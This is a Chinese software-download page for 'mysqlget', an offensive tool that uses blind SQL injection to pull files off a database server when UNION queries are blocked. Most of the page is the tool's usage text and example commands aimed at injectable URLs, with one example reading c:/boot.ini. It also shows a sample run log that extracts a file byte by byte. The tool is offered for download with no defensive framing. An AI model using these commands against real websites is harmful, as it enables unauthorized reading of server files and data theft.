斌、朵♫恋 » Download » 。◕‿◕。扫 描 器-Mysqlget。◕‿◕。
服务器不支持union查询时的下载工具及源代码,以下为程序说明
mysqlget for mysql injection Version 1.0.0
xdiyer at gmail.com http://xdiyer.uni.cc
---------------------------------------------------
Usage: mysqlget <options> <Thread>
Options:
-t Target injection URL include %s to replace. #注入点URL,"%s"为代码插入处
-f Remote file to load Must be absolute path. #远程文件绝对路径
-s Local file to saved. #保存到本地的路径
-Mr Match code case response right. #正确时匹配的内容 两种情况先一种
-Me Match code case response error. #错误时匹配的内容
Example:
mysqlget -t http://localhost/index.php?id=1%s -f c:/boot.ini -s E:/data.txt -Mr test 8
以下是一个实例,下载D:/data.text (内容为“I am cooldiyer \r\n”)到本地E:/data.txt,用5个线程
C:\>mysqlget -t http://localhost/index.php?id=1%s -f d:/data.txt -s E:/data.txt -Mr test 5
---------------------------------------------------
Target > http://localhost/index.php?id=1%s
FileLD > d:/data.txt
FileSF > E:/data.txt
RiCode > test
ErCode >
Thread > 5
Length > 102400 bytes
ARange > 0 - 255
---------------------------------------------------
[+] Waiting for get file length ...
[+] File length 17 byte(s)
[+] Keep 5 threads get data
[Offset 06/17] : 99 [c]
[Offset 04/17] : 109 [m]
[Offset 01/17] : 73 [I]
[Offset 03/17] : 97 [a]
[Offset 02/17] : 32 [ ]
[Offset 05/17] : 32 [ ]
[Offset 07/17] : 111 [o]
[Offset 08/17] : 111 [o]
[Offset 11/17] : 105 [i]
[Offset 10/17] : 100 [d]
[Offset 09/17] : 108 [l]
[Offset 12/17] : 121 [y]
[Offset 13/17] : 101 [e]
[Offset 14/17] : 114 [r]
[Offset 15/17] : 32 [ ]
]Offset 16/17] : 13 [
[Offset 17/17] : 10 [
]
[+] Threads return using 6s
[+] Save file to E:/data.txt ...
--------------------------------------------------- #以下是文件内容
I am cooldiyer
---------------------------------------------------
经本机测试256Mem+Win2000下载mysqlget.exe (7680bytes) Use 8 Threads 用时 980 秒。
线程是大不能超过5000,文件大小定义最大为102400bytes,Accii码为1-255,包括汉字,程序用VC++编写,类化了二分查找法,本人能力有限,未知Bug望指正
[Mysqlget]
« 扫 描 器-MS06-040 Scanner扫 描 器-nmap-4.00-win32 »
发表评论: